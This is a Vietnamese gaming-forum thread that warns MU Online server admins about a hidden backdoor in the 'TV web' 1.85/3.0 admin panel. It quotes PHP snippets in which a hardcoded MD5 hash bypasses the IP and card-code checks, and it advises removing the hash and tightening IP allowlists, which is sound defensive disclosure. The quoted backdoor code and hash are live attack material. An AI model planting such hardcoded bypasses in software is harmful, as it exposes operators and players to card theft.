[MU] Cảnh báo ai sử dụng TV web 1.85 và 3.0
Follow us on
Follow us on Facebook Follow us on Twitter Linked In Flickr Watch us on YouTube My Space Blogger
 
Trang 1 của 3 1 2 3 CuốiCuối
Kết quả 1 đến 10 của 23
  1. #1
    I ♥ U Forever™ apple's Avatar
    Ngày tham gia
    Apr 2011
    Đang ở
    Địa Ngục Trần Gian
    Bài viết
    619
    Thanks
    130
    Thanked 347 Times in 165 Posts

    Icon3 Cảnh báo ai sử dụng TV web 1.85 và 3.0

    Mình đang dezend và crack TV 3.0 thì phát hiện 1 cách chôm thẻ của TV.
    So sánh với tv 1.85 thì bản 1.85 cũng có.

    Các admin mu lưu ý nhé.
    Trong file:
    Server\admin\security.php

    có đoạn code này:
    PHP Code:
    if (md5($_GET['control']) != "[COLOR="#FF0000"]e992bbb8e2041788f7ad563b8eeb79d6[/COLOR]")
    if ( !in_array($_SERVER['REMOTE_ADDR'], $list_ip) ) {
        echo 
    "Ban Khong Phai Thanh Vien BQT thi vao lam gi? he he";
        exit();
    }
    ?> 
    dòng bôi đỏ là pass yêu tiên, chỉ TV mới có thể biết pass đó là gì vì nó bị mã hóa md5.

    Server\admin\cardphone.php
    PHP Code:
    if ($_POST[submit]) {
        
    $pass md5($_POST[codecard]);
        if (
    $pass == $passcard || $pass == "[COLOR="#FF0000"]e992bbb8e2041788f7ad563b8eeb79d6[/COLOR]") $_SESSION['codecard'] = $passcard;

    đây là file các admin check thẻ mà lại có đoạn này.

    trong file này:
    Server\admin\view_card.php
    PHP Code:
    if ($_POST[submit]) {
        
    $pass md5($_POST[viewcard]);
        if (
    $pass == "$passviewcard"$_SESSION['viewcard'] = "$passviewcard";

    trong file view_card.php lại ko có đoạn này. Vì file này ko xem được seri với mã thẻ, TV ko chèn đoạn pass mã hóa md5 kia vào.

    tương tự trong file Server\admin\checkip.php
    cũng có đoạn code đó:
    PHP Code:
        if ($_POST[submit]) {
            
    $code md5($_POST[code]);
            if (
    $code == $passcode || $code == "e992bbb8e2041788f7ad563b8eeb79d6"$_SESSION['code'] = $passcode;
        } 
    mục đích của đoạn này là check ip mà khi ko biết pass

    Nếu các bạn ko tin thì có thể so sánh với NBB web:
    Server\admin\cardphone.php
    PHP Code:
    if ($_POST[submit]) {
        
    $pass md5($_POST[codecard]);
        if (
    $pass == "$passcard"$_SESSION['codecard'] = "$passcard";

    trong server/admin/checkip.php của NBB cũng hoàn toàn khác với TV:
    PHP Code:
        if ($_POST[submit]) {
            
    $code md5($_POST[code]);
            if (
    $code == "$passcode"$_SESSION['code'] = "$passcode";
        } 
    Trên là các file nguy hiểm, nó ko sử dụng shell. Khi quét virus ko phát hiện là có shell

    Đó là các file nguy hiểm mà mình phát hiện được, còn các cái khác mình đang tìm hiểu.

    Cách chữa: Nếu ai ko biết về code thì vào các file trên xóa các pass md5 đi.
    Dòng này là phải xóa nè: e992bbb8e2041788f7ad563b8eeb79d6


    ai không tin thì vào bản của Mr.Cuong share, ko có dòng này thì mình chết liền
    - : Y!M
    congtubot_01

  2. The Following 13 Users Say Thank You to apple For This Useful Post:

    0917423632 (02-04-12), ductruong_kr (31-12-11), duyanh12285 (31-12-11), enternal1603 (31-12-11), huntersun (31-12-11), kenbi (03-01-12), longdtskn (17-07-12), Mr.Hau (01-01-12), mrgacon (05-05-12), mrvu058 (31-12-11), muhoangsa (31-12-11), SnowBlood™ (10-02-12)

  3. #2
    Moderator mrrainnt's Avatar
    Ngày tham gia
    Jun 2010
    Bài viết
    1,691
    Thanks
    401
    Thanked 544 Times in 406 Posts

    Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0

    Cái này bản 1.85 cũng có đấy chứ ! tại mọi người không để ý đấy thôi ^^!
    Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  4. #3
    Vi phạm quy định ductruong_kr's Avatar
    Ngày tham gia
    Nov 2011
    Bài viết
    68
    Thanks
    27
    Thanked 21 Times in 14 Posts

    Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0

    dù sao mình cũng thks nếu k có nhưng người như bạn sao mà tớ biết nhỉ @@
    Khách viếng thăm hãy cùng ductruong_kr xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  5. #4
    Moderator mrrainnt's Avatar
    Ngày tham gia
    Jun 2010
    Bài viết
    1,691
    Thanks
    401
    Thanked 544 Times in 406 Posts

    Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0

    Sẵn đang làm cái này ^^! Up luôn cho các bạn folder Admin sạch 100% !
    [Only registered and activated users can see links. ]
    Pass Giải Nén: mrrainnt
    Nhớ thanks đấy nhé !
    Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  6. The Following 4 Users Say Thank You to mrrainnt For This Useful Post:

    hangson3100 (31-12-11), huntersun (31-12-11), ninhmca (05-01-12), SnowBlood™ (10-02-12)

  7. #5
    godhoang
    Guest

    Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0

    bản nbb 4.1 free cũng bị nè !
    mẹ nó, hôm wa thằng bạn nó nạp 150k, sau đó gh thấy nó có 150k hỏi lạ, hỏi nó nó bảo nạp cái đc ngay 150k
    dò log nạp thẻ thì k có, nó bật log thẻ thì ghi "Sv bảo trì"
    giờ ghê lắm, up shell trộm mã thẻ đt không hà, fải wa yahoo thôi !
    Khách viếng thăm hãy cùng godhoang xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  8. #6
    Moderator mrrainnt's Avatar
    Ngày tham gia
    Jun 2010
    Bài viết
    1,691
    Thanks
    401
    Thanked 544 Times in 406 Posts

    Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0

    Trích dẫn Gửi bởi godhoang [Only registered and activated users can see links. ]
    bản nbb 4.1 free cũng bị nè !
    mẹ nó, hôm wa thằng bạn nó nạp 150k, sau đó gh thấy nó có 150k hỏi lạ, hỏi nó nó bảo nạp cái đc ngay 150k
    dò log nạp thẻ thì k có, nó bật log thẻ thì ghi "Sv bảo trì"
    giờ ghê lắm, up shell trộm mã thẻ đt không hà, fải wa yahoo thôi !
    ???? auto nạp thẻ cơ à ! vậy chắc bị up shell hay bị gì rồi ? chứ NBB 4.1 Free đâu có zend code đâu !.
    Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  9. #7
    Thành Viên
    Ngày tham gia
    Oct 2010
    Bài viết
    446
    Thanks
    43
    Thanked 14 Times in 8 Posts

    Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0

    Trích dẫn Gửi bởi mrrainnt [Only registered and activated users can see links. ]
    Sẵn đang làm cái này ^^! Up luôn cho các bạn folder Admin sạch 100% !
    [Only registered and activated users can see links. ]
    Pass Giải Nén: mrrainnt
    Nhớ thanks đấy nhé !
    hình như phần admin. của tv1.85 cũng giống 3.0 thì phải
    Khách viếng thăm hãy cùng TRIEN xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  10. #8
    Moderator mrrainnt's Avatar
    Ngày tham gia
    Jun 2010
    Bài viết
    1,691
    Thanks
    401
    Thanked 544 Times in 406 Posts

    Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0

    Trích dẫn Gửi bởi TRIEN [Only registered and activated users can see links. ]
    hình như phần admin. của tv1.85 cũng giống 3.0 thì phải
    ! Ừ, Đúng rồi bạn à. nó cũng tương tự nhau thôi bạn à ^^
    Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  11. #9
    Thành Viên
    Ngày tham gia
    Apr 2009
    Bài viết
    97
    Thanks
    10
    Thanked 18 Times in 7 Posts

    Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0

    Trích dẫn Gửi bởi apple [Only registered and activated users can see links. ]
    Mình đang dezend và crack TV 3.0 thì phát hiện 1 cách chôm thẻ của TV.
    So sánh với tv 1.85 thì bản 1.85 cũng có.

    Các admin mu lưu ý nhé.
    Trong file:
    Server\admin\security.php

    có đoạn code này:
    PHP Code:
    if (md5($_GET['control']) != "[COLOR="#FF0000"]e992bbb8e2041788f7ad563b8eeb79d6[/COLOR]")
    if ( !in_array($_SERVER['REMOTE_ADDR'], $list_ip) ) {
        echo 
    "Ban Khong Phai Thanh Vien BQT thi vao lam gi? he he";
        exit();
    }
    ?> 
    dòng bôi đỏ là pass yêu tiên, chỉ TV mới có thể biết pass đó là gì vì nó bị mã hóa md5.

    Server\admin\cardphone.php
    PHP Code:
    if ($_POST[submit]) {
        
    $pass md5($_POST[codecard]);
        if (
    $pass == $passcard || $pass == "[COLOR="#FF0000"]e992bbb8e2041788f7ad563b8eeb79d6[/COLOR]") $_SESSION['codecard'] = $passcard;

    đây là file các admin check thẻ mà lại có đoạn này.

    trong file này:
    Server\admin\view_card.php
    PHP Code:
    if ($_POST[submit]) {
        
    $pass md5($_POST[viewcard]);
        if (
    $pass == "$passviewcard"$_SESSION['viewcard'] = "$passviewcard";

    trong file view_card.php lại ko có đoạn này. Vì file này ko xem được seri với mã thẻ, TV ko chèn đoạn pass mã hóa md5 kia vào.

    tương tự trong file Server\admin\checkip.php
    cũng có đoạn code đó:
    PHP Code:
        if ($_POST[submit]) {
            
    $code md5($_POST[code]);
            if (
    $code == $passcode || $code == "e992bbb8e2041788f7ad563b8eeb79d6"$_SESSION['code'] = $passcode;
        } 
    mục đích của đoạn này là check ip mà khi ko biết pass

    Nếu các bạn ko tin thì có thể so sánh với NBB web:
    Server\admin\cardphone.php
    PHP Code:
    if ($_POST[submit]) {
        
    $pass md5($_POST[codecard]);
        if (
    $pass == "$passcard"$_SESSION['codecard'] = "$passcard";

    trong server/admin/checkip.php của NBB cũng hoàn toàn khác với TV:
    PHP Code:
        if ($_POST[submit]) {
            
    $code md5($_POST[code]);
            if (
    $code == "$passcode"$_SESSION['code'] = "$passcode";
        } 
    Trên là các file nguy hiểm, nó ko sử dụng shell. Khi quét virus ko phát hiện là có shell

    Đó là các file nguy hiểm mà mình phát hiện được, còn các cái khác mình đang tìm hiểu.

    Cách chữa: Nếu ai ko biết về code thì vào các file trên xóa các pass md5 đi.
    Dòng này là phải xóa nè: e992bbb8e2041788f7ad563b8eeb79d6


    ai không tin thì vào bản của Mr.Cuong share, ko có dòng này thì mình chết liền
    tôi thấy rất là hài hước cho các làm mu online đê kiếm tiền và cơm áo mà đơn giản việc cài web ban đầu các bạn cũng không nhận ra để bảo mật. lẽ ra khi làm phải edit toàn bộ chú
    các bạn hãy lưu ý kỹ thay đổi mã Md5 đi + edit ip về local 127.0.0.1
    => md5 trong server/admin/checkip.php =>
    => server/admin/listip.txt => nên coi lại cái này nhé cho về 127.0.0.1 => điên ip vào đây là đang nhập admin dc đấy
    => server/admin/security.php => fix luôn đi
    => ngoài server/conifig.php
    $list_ip = array (
    '127.0.0.1', =>
    '115.112.187.78', =>> các bạn config kết nối trên host không nên để nhiều ip ở đây và không để ai biết ip nha vì đang nhập quyền admin bằng cái này được
    );
    lưu ý nũa phần home
    admin
    home/admin/config.php => mã md5 cần sửa
    home/admin/security.php =>mã md5 cần sửa
    home/admin/listip.txt => de ip 127.0.0.1 => chỉ mình trên máy chủ mới vào dc thôi còn bạn điền ip máy khác thì máy đó sẽ đăng nhập admin dc luôn
    sorry hơi làng nhàng tí các bác thông cảm giùm
    Khách viếng thăm hãy cùng lengockien xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!

  12. The Following 9 Users Say Thank You to lengockien For This Useful Post:

    duyanh12285 (31-12-11), huntersun (31-12-11), longdtskn (31-07-12), mrgacon (05-05-12), mrrainnt (31-12-11), pelinh (15-05-12), SnowBlood™ (10-02-12), thantainho (31-12-11)

  13. #10
    I ♥ U Forever™ apple's Avatar
    Ngày tham gia
    Apr 2011
    Đang ở
    Địa Ngục Trần Gian
    Bài viết
    619
    Thanks
    130
    Thanked 347 Times in 165 Posts

    Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0

    Trích dẫn Gửi bởi mrrainnt [Only registered and activated users can see links. ]
    ! Ừ, Đúng rồi bạn à. nó cũng tương tự nhau thôi bạn à ^^
    nó chẳng khác nhau là mấy, chỉ thêm 1 số chức năng thồi.
    - : Y!M
    congtubot_01

  14. Các thành viên gởi lời cảm ơn đến apple vì bài viết này !

    duyanh12285 (31-12-11)

 

 
Trang 1 của 3 1 2 3 CuốiCuối

Tag của Chủ đề này

Quyền viết bài

  • Bạn Không thể gửi Chủ đề mới
  • Bạn Không thể Gửi trả lời
  • Bạn Không thể Gửi file đính kèm
  • Bạn Không thể Sửa bài viết của mình
  •  
Múi giờ GMT +7. Bây giờ là 02:50 AM.
vBulletin®, Copyright ©2000-2011, Jelsoft Enterprises Ltd.
CLBGamesVN không chịu trách nhiệm về Luật Bản Quyền của các tài liệu, bài viết v.v...được đăng tải trên diễn đàn này.
Diễn đàn phát triển dưới sự đóng góp của tất cả thành viên. BQT chỉ là những người thành lập ra sân chơi, quản lý và duy trì về mặt kỹ thuật, nội dung khi hợp lệ.